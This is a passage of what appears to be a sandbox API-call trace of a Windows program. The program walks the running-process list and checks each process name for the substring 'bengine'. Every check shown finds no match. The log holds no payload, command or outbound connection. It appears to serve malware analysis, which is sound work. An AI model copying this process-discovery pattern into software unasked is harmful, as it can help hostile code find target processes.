(in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0101.465] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="mxslipstream.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0101.465] LocalAlloc (uFlags=0x40, uBytes=0x11) returned 0x357f040 [0101.465] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="mxslipstream.exe", cchWideChar=-1, lpMultiByteStr=0x357f040, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mxslipstream.exe", lpUsedDefaultChar=0x0) returned 17 [0101.466] lstrcpyA (in: lpString1=0x567fabc, lpString2="mxslipstream.exe" | out: lpString1="mxslipstream.exe") returned="mxslipstream.exe" [0101.466] StrStrIA (lpFirst="mxslipstream.exe", lpSrch="bengine") returned 0x0 [0101.466] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0101.467] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="omnipos.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0101.467] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x356f450 [0101.467] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="omnipos.exe", cchWideChar=-1, lpMultiByteStr=0x356f450, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="omnipos.exe", lpUsedDefaultChar=0x0) returned 12 [0101.467] lstrcpyA (in: lpString1=0x567fabc, lpString2="omnipos.exe" | out: lpString1="omnipos.exe") returned="omnipos.exe" [0101.467] StrStrIA (lpFirst="omnipos.exe", lpSrch="bengine") returned 0x0 [0101.467] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0101.468] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="spcwin.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0101.468] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x356f2e8 [0101.468] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="spcwin.exe", cchWideChar=-1, lpMultiByteStr=0x356f2e8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spcwin.exe", lpUsedDefaultChar=0x0) returned 11 [0101.468] lstrcpyA (in: lpString1=0x567fabc, lpString2="spcwin.exe" | out: lpString1="spcwin.exe") returned="spcwin.exe" [0101.468] StrStrIA (lpFirst="spcwin.exe", lpSrch="bengine") returned 0x0 [0101.468] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe48, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0101.469] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="spgagentservice.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0101.469] LocalAlloc (uFlags=0x40, uBytes=0x14) returned 0x357ee40 [0101.470] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="spgagentservice.exe", cchWideChar=-1, lpMultiByteStr=0x357ee40, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spgagentservice.exe", lpUsedDefaultChar=0x0) returned 20 [0101.470] lstrcpyA (in: lpString1=0x567fabc, lpString2="spgagentservice.exe" | out: lpString1="spgagentservice.exe") returned="spgagentservice.exe" [0101.470] StrStrIA (lpFirst="spgagentservice.exe", lpSrch="bengine") returned 0x0 [0101.470] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1004, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0101.471] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="utg2.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0101.471] LocalAlloc (uFlags=0x40, uBytes=0x9) returned 0x356f468 [0101.471] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="utg2.exe", cchWideChar=-1, lpMultiByteStr=0x356f468, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="utg2.exe", lpUsedDefaultChar=0x0) returned 9 [0101.471] lstrcpyA (in: lpString1=0x567fabc, lpString2="utg2.exe" | out: lpString1="utg2.exe") returned="utg2.exe" [0101.471] StrStrIA (lpFirst="utg2.exe", lpSrch="bengine") returned 0x0 [0101.471] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1018, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="saying.exe")) returned 1 [0101.472] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="saying.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0101.472] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x356f318 [0101.472] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="saying.exe", cchWideChar=-1, lpMultiByteStr=0x356f318, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="saying.exe", lpUsedDefaultChar=0x0) returned 11 [0101.472] lstrcpyA (in: lpString1=0x567fabc, lpString2="saying.exe" | out: lpString1="saying.exe") returned="saying.exe" [0101.472] StrStrIA (lpFirst="saying.exe", lpSrch="bengine") returned 0x0 [0101.472] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x102c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="ripe.exe")) returned 1 [0101.473] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="ripe.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0101.473] LocalAlloc (uFlags=0x40, uBytes=0x9) returned 0x356f528 [0101.473] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="ripe.exe", cchWideChar=-1, lpMultiByteStr=0x356f528, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ripe.exe", lpUsedDefaultChar=0x0) returned 9 [0101.473] lstrcpyA (in: lpString1=0x567fabc, lpString2="ripe.exe" | out: lpString1="ripe.exe") returned="ripe.exe" [0101.473] StrStrIA (lpFirst="ripe.exe", lpSrch="bengine") returned 0x0 [0101.473] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1040, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="acoustic.exe")) returned 1 [0101.474] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="acoustic.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0101.474] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x356f330 [0101.474] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="acoustic.exe", cchWideChar=-1, lpMultiByteStr=0x356f330, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="acoustic.exe", lpUsedDefaultChar=0x0) returned 13 [0101.474] lstrcpyA (in: lpString1=0x567fabc, lpString2="acoustic.exe" | out: lpString1="acoustic.exe") returned="acoustic.exe" [0101.474] StrStrIA (lpFirst="acoustic.exe", lpSrch="bengine") returned 0x0 [0101.474] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1054, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="mail.exe")) returned 1 [0101.475] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="mail.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0101.475] LocalAlloc (uFlags=0x40, uBytes=0x9) returned 0x356f480 [0101.475] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="mail.exe", cchWideChar=-1, lpMultiByteStr=0x356f480, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mail.exe", lpUsedDefaultChar=0x0) returned 9 [0101.475] lstrcpyA (in: lpString1=0x567fabc, lpString2="mail.exe" | out: lpString1="mail.exe") returned="mail.exe" [0101.475] StrStrIA (lpFirst="mail.exe", lpSrch="bengine") returned 0x0 [0101.475] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x10c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0101.476] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="WmiPrvSE.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0101.476] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x356f498 [0101.476] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="WmiPrvSE.exe", cchWideChar=-1, lpMultiByteStr=0x356f498, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WmiPrvSE.exe", lpUsedDefaultChar=0x0) returned 13 [0101.476] lstrcpyA (in: lpString1=0x567fabc, lpString2="WmiPrvSE.exe" | out: lpString1="WmiPrvSE.exe") returned="WmiPrvSE.exe" [0101.476] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="bengine") returned 0x0 [0101.476] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x10cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0101.477] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0101.477] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x356f4b0 [0101.477] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x356f4b0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0101.477] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0101.477] StrStrIA (lpFirst="svchost.exe", lpSrch="bengine") returned 0x0 [0101.477] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x11a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0101.478] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="dllhost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0101.478] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x356f4c8 [0101.478] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="dllhost.exe", cchWideChar=-1, lpMultiByteStr=0x356f4c8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dllhost.exe", lpUsedDefaultChar=0x0) returned 12 [0101.478] lstrcpyA (in: lpString1=0x567fabc, lpString2="dllhost.exe" | out: lpString1="dllhost.exe") returned="dllhost.exe" [0101.478] StrStrIA (lpFirst="dllhost.exe", lpSrch="bengine") returned 0x0 [0101.478] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1208, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x3ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0101.490] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="taskhostw.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0101.490] LocalAlloc (uFlags=0x40, uBytes=0xe) returned 0x356f4e0 [0101.491] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="taskhostw.exe", cchWideChar=-1, lpMultiByteStr=0x356f4e0, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="taskhostw.exe", lpUsedDefaultChar=0x0) returned 14 [0101.491] lstrcpyA (in: lpString1=0x567fabc, lpString2="taskhostw.exe" | out: lpString1="taskhostw.exe") returned="taskhostw.exe" [0101.491] StrStrIA (lpFirst="taskhostw.exe", lpSrch="bengine") returned 0x0 [0101.491] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1210, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x3ac, pcPriClassBase=6, dwFlags=0x0, szExeFile="UsoClient.exe")) returned 1 [0101.492] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="UsoClient.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0101.492] LocalAlloc (uFlags=0x40, uBytes=0xe) returned 0x356f390 [0101.492] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="UsoClient.exe", cchWideChar=-1, lpMultiByteStr=0x356f390, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="UsoClient.exe", lpUsedDefaultChar=0x0) returned 14 [0101.492] lstrcpyA (in: lpString1=0x567fabc, lpString2="UsoClient.exe" | out: lpString1="UsoClient.exe") returned="UsoClient.exe" [0101.492] StrStrIA (lpFirst="UsoClient.exe", lpSrch="bengine") returned 0x0 [0101.492] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1218, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x3ac, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0101.493] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="taskhostw.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0101.493] LocalAlloc (uFlags=0x40, uBytes=0xe) returned 0x356f3a8 [0101.493] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="taskhostw.exe", cchWideChar=-1, lpMultiByteStr=0x356f3a8, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="taskhostw.exe", lpUsedDefaultChar=0x0) returned 14 [0101.493] lstrcpyA (in: lpString1=0x567fabc, lpString2="taskhostw.exe" | out: lpString1="taskhostw.exe") returned="taskhostw.exe" [0101.493] StrStrIA (lpFirst="taskhostw.exe", lpSrch="bengine") returned 0x0 [0101.493] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1224, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x3ac, pcPriClassBase=6, dwFlags=0x0, szExeFile="UNPCampaignManager.exe")) returned 1 [0101.494] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="UNPCampaignManager.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0101.494] LocalAlloc (uFlags=0x40, uBytes=0x17) returned 0x357f060 [0101.494] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="UNPCampaignManager.exe", cchWideChar=-1, lpMultiByteStr=0x357f060, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="UNPCampaignManager.exe", lpUsedDefaultChar=0x0) returned 23 [0101.494] lstrcpyA (in: lpString1=0x567fabc, lpString2="UNPCampaignManager.exe" | out: lpString1="UNPCampaignManager.exe") returned="UNPCampaignManager.exe" [0101.494] StrStrIA (lpFirst="UNPCampaignManager.exe", lpSrch="bengine") returned 0x0 [0101.494] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x122c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x3ac, pcPriClassBase=6, dwFlags=0x0, szExeFile="DeviceCensus.exe")) returned 1 [0101.495] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="DeviceCensus.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0101.495] LocalAlloc (uFlags=0x40, uBytes=0x11) returned 0x357eee0 [0101.495] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="DeviceCensus.exe", cchWideChar=-1, lpMultiByteStr=0x357eee0, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DeviceCensus.exe", lpUsedDefaultChar=0x0) returned 17 [0101.495] lstrcpyA (in: lpString1=0x567fabc, lpString2="DeviceCensus.exe" | out: lpString1="DeviceCensus.exe") returned="DeviceCensus.exe" [0101.495] StrStrIA (lpFirst="DeviceCensus.exe", lpSrch="bengine") returned 0x0 [0101.495] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1234, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x3ac, pcPriClassBase=6, dwFlags=0x0, szExeFile="AppHostRegistrationVerifier.exe")) returned 1 [0101.496] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="AppHostRegistrationVerifier.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0101.496] LocalAlloc (uFlags=0x40, uBytes=0x20) returned 0x357e910 [0101.496] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="AppHostRegistrationVerifier.exe", cchWideChar=-1, lpMultiByteStr=0x357e910, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AppHostRegistrationVerifier.exe", lpUsedDefaultChar=0x0) returned 32 [0101.496] lstrcpyA (in: lpString1=0x567fabc, lpString2="AppHostRegistrationVerifier.exe" | out: lpString1="AppHostRegistrationVerifier.exe") returned="AppHostRegistrationVerifier.exe" [0101.496] StrStrIA (lpFirst="AppHostRegistrationVerifier.exe", lpSrch="bengine") returned 0x0 [0101.496] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1280, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x122c, pcPriClassBase=6, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0101.497] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="conhost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0101.497] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x356f3c0 [0101.497] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="conhost.exe", cchWideChar=-1, lpMultiByteStr=0x356f3c0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="conhost.exe", lpUsedDefaultChar=0x0) returned 12 [0101.497] lstrcpyA (in: lpString1=0x567fabc, lpString2="conhost.exe" | out: lpString1="conhost.exe") returned="conhost.exe" [0101.497] StrStrIA (lpFirst="conhost.exe", lpSrch="bengine") returned 0x0 [0101.497] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1210, pcPriClassBase=6, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0101.498] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="conhost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0101.498] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x356f3d8 [0101.498] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="conhost.exe", cchWideChar=-1, lpMultiByteStr=0x356f3d8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="conhost.exe", lpUsedDefaultChar=0x0) returned 12 [0101.498] lstrcpyA (in: lpString1=0x567fabc, lpString2="conhost.exe" | out: lpString1="conhost.exe") returned="conhost.exe" [0101.498] StrStrIA (lpFirst="conhost.exe", lpSrch="bengine") returned 0x0 [0101.498] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x11dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="rxodge.exe")) returned 1 [0101.499] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="rxodge.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0101.499] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x356f4f8 [0101.499] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="rxodge.exe", cchWideChar=-1, lpMultiByteStr=0x356f4f8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="rxodge.exe", lpUsedDefaultChar=0x0) returned 11 [0101.499] lstrcpyA (in: lpString1=0x567fabc, lpString2="rxodge.exe" | out: lpString1="rxodge.exe") returned="rxodge.exe" [0101.499] StrStrIA (lpFirst="rxodge.exe", lpSrch="bengine") returned 0x0 [0101.499] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0101.500] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="sppsvc.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0101.500] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x356f510 [0101.500] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="sppsvc.exe", cchWideChar=-1, lpMultiByteStr=0x356f510, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sppsvc.exe", lpUsedDefaultChar=0x0) returned 11 [0101.500] lstrcpyA (in: lpString1=0x567fabc, lpString2="sppsvc.exe" | out: lpString1="sppsvc.exe") returned="sppsvc.exe" [0101.501] StrStrIA (lpFirst="sppsvc.exe", lpSrch="bengine") returned 0x0 [0101.501] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="TrustedInstaller.exe")) returned 1 [0101.501] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="TrustedInstaller.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0101.501] LocalAlloc (uFlags=0x40, uBytes=0x15) returned 0x357ee00 [0101.502] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="TrustedInstaller.exe", cchWideChar=-1, lpMultiByteStr=0x357ee00, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TrustedInstaller.exe", lpUsedDefaultChar=0x0) returned 21 [0101.502] lstrcpyA (in: 